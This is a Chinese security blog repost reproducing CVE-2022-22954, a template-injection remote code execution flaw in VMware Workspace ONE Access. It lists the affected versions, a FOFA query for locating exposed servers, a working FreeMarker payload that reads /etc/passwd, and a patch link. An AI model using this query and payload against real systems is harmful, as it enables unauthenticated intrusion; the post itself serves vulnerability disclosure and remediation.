VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现

admin 2022年4月12日18:06:16评论525 views字数 1186阅读3分57秒阅读模式

一 漏洞介绍

    近日,VMware 官方测试中心发布了关于 Workspace ONE Access (前称 VMware Identity Manager)的多个漏洞补丁,其中曝光了一个服务器模板注入导致的远程命令执行漏洞(CVE-2022-22954),两个 OAuth2 ACS 身份验证绕过漏洞(CVE-2022-22955, CVE-2022-22956),两个 JDBC 注入导致的远程命令中执行漏洞(CVE-2022-22957,CVE-2022-22958)。

VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现

    Workspace ONE Access 是 VMware 公司开发的一款智能驱动型数字化工作空间平台,通过 Workspace ONE Access 能够随时随地在任意设备上轻松、安全地交付和管理任意应用。


    VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。


    该漏洞编号CVE-2022-22954,CVSS评分:9.8,危害等级:严重


二 受影响版本

VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 )VMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6)VMware Realize Automation (版本号:7.6)

三 FOFA查询

app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager"

VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现


四 漏洞复现

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现


五 修复建议

    参考漏洞影响范围进行排查。

    目前官方已发布修复补丁,请查看官方消息进行修复:

https://kb.vmware.com/s/article/88099

六 参考文章

https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247489074&idx=1&sn=6de1e590a02833dc65acf5c4d5bd5ed9https://mp.weixin.qq.com/s?__biz=MzAwMjQ2NTQ4Mg==&mid=2247489068&idx=1&sn=b46228d2ad0871f0ddac7be8de03a7d6https://nosec.org/home/detail/4988.html

原文始发于微信公众号(Reset安全):VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月12日18:06:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VMware Workspace ONE Access RCE CVE-2022-22954 漏洞复现http://cn-sec.com/archives/900668.html

发表评论

匿名网友 填写信息